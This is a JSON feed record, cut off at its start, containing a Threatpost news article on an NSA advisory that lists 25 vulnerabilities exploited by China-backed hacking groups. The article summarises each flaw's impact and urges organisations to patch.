"info", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). 
\u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. 
And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. 
An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) (CVE-2020-1472), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nCVE-2020-0601, the first vulnerability for which Microsoft publicly credited the NSA as the reporter, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "modified": "2020-10-21T20:31:17", "published": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}